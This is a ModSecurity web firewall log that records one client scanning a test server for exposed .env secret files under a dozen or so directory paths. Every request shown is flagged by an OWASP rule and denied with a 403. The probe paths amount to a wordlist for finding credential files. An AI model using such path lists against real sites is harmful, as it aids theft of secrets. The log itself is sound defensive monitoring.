[Fri Nov 28 21:10:10.847155 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSoBooXAn3U8Qs12Ils-SAAAAAw"]
[Fri Nov 28 21:10:10.847387 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSoBooXAn3U8Qs12Ils-SAAAAAw"]
[Fri Nov 28 21:10:10.847576 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSoBooXAn3U8Qs12Ils-SAAAAAw"]
[Fri Nov 28 21:10:11.129561 2025] [:error] [pid 393565] [client 3.23.113.253:39728] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSoBo7WdSaYC5IL8nRz2DwAAAAQ"]
[Fri Nov 28 21:10:11.130518 2025] [:error] [pid 393565] [client 3.23.113.253:39728] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSoBo7WdSaYC5IL8nRz2DwAAAAQ"]
[Fri Nov 28 21:10:11.130721 2025] [:error] [pid 393565] [client 3.23.113.253:39728] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSoBo7WdSaYC5IL8nRz2DwAAAAQ"]
[Fri Nov 28 21:10:11.320843 2025] [:error] [pid 393566] [client 3.23.113.253:39980] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSoBo_3mXqY8tAoubqaekwAAAAU"]
[Fri Nov 28 21:10:11.321103 2025] [:error] [pid 393566] [client 3.23.113.253:39980] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSoBo_3mXqY8tAoubqaekwAAAAU"]
[Fri Nov 28 21:10:11.321348 2025] [:error] [pid 393566] [client 3.23.113.253:39980] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSoBo_3mXqY8tAoubqaekwAAAAU"]
[Fri Nov 28 21:10:11.490265 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSoBo6-Idoxz20B0R39VDgAAAAI"]
[Fri Nov 28 21:10:11.490539 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSoBo6-Idoxz20B0R39VDgAAAAI"]
[Fri Nov 28 21:10:11.490714 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSoBo6-Idoxz20B0R39VDgAAAAI"]
[Fri Nov 28 21:10:11.757657 2025] [:error] [pid 393567] [client 3.23.113.253:40228] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSoBo3szj5k1X1MGnY0lPgAAAAY"]
[Fri Nov 28 21:10:11.757913 2025] [:error] [pid 393567] [client 3.23.113.253:40228] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSoBo3szj5k1X1MGnY0lPgAAAAY"]
[Fri Nov 28 21:10:11.758157 2025] [:error] [pid 393567] [client 3.23.113.253:40228] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSoBo3szj5k1X1MGnY0lPgAAAAY"]
[Fri Nov 28 21:10:11.957181 2025] [:error] [pid 393568] [client 3.23.113.253:40512] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSoBo6xPnxoAaQTG8h5RiAAAAAc"]
[Fri Nov 28 21:10:11.957466 2025] [:error] [pid 393568] [client 3.23.113.253:40512] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSoBo6xPnxoAaQTG8h5RiAAAAAc"]
[Fri Nov 28 21:10:11.957683 2025] [:error] [pid 393568] [client 3.23.113.253:40512] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSoBo6xPnxoAaQTG8h5RiAAAAAc"]
[Fri Nov 28 21:10:12.263233 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSoBpOlfIsf8iBzToT1BPQAAABg"]
[Fri Nov 28 21:10:12.263451 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSoBpOlfIsf8iBzToT1BPQAAABg"]
[Fri Nov 28 21:10:12.263882 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSoBpOlfIsf8iBzToT1BPQAAABg"]
[Fri Nov 28 21:10:12.264359 2025] [:error] [pid 393570] [client 3.23.113.253:40724] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSoBpLAO42aAiUR7p2y8kQAAAAo"]
[Fri Nov 28 21:10:12.264578 2025] [:error] [pid 393570] [client 3.23.113.253:40724] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSoBpLAO42aAiUR7p2y8kQAAAAo"]
[Fri Nov 28 21:10:12.264767 2025] [:error] [pid 393570] [client 3.23.113.253:40724] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSoBpLAO42aAiUR7p2y8kQAAAAo"]
[Fri Nov 28 21:10:12.805471 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSoBpIXAn3U8Qs12Ils-SQAAAAw"]
[Fri Nov 28 21:10:12.805785 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSoBpIXAn3U8Qs12Ils-SQAAAAw"]
[Fri Nov 28 21:10:12.806042 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSoBpIXAn3U8Qs12Ils-SQAAAAw"]
[Fri Nov 28 21:10:12.970770 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSoBpOlfIsf8iBzToT1BPgAAABg"]
[Fri Nov 28 21:10:12.970992 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSoBpOlfIsf8iBzToT1BPgAAABg"]
[Fri Nov 28 21:10:12.971206 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSoBpOlfIsf8iBzToT1BPgAAABg"]
[Fri Nov 28 21:10:13.237402 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSoBpa-Idoxz20B0R39VDwAAAAI"]
[Fri Nov 28 21:10:13.237621 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSoBpa-Idoxz20B0R39VDwAAAAI"]
[Fri Nov 28 21:10:13.237809 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSoBpa-Idoxz20B0R39VDwAAAAI"]
[Fri Nov 28 21:10:13.545985 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSoBpelfIsf8iBzToT1BPwAAABg"]
[Fri Nov 28 21:10:13.546244 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSoBpelfIsf8iBzToT1BPwAAABg"]
[Fri Nov 28 21:10:13.546478 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSoBpelfIsf8iBzToT1BPwAAABg"]
[Fri Nov 28 21:10:13.547683 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSoBpa-Idoxz20B0R39VEAAAAAI"]
[Fri Nov 28 21:10:13.547882 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSoBpa-Idoxz20B0R39VEAAAAAI"]
[Fri Nov 28 21:10:13.548051 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSoBpa-Idoxz20B0R39VEAAAAAI"]
[Fri Nov 28 21:10:15.176557 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSoBp-lfIsf8iBzToT1BQQAAABg"]
[Fri Nov 28 21:10:15.176797 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSoBp-lfIsf8iBzToT1BQQAAABg"]
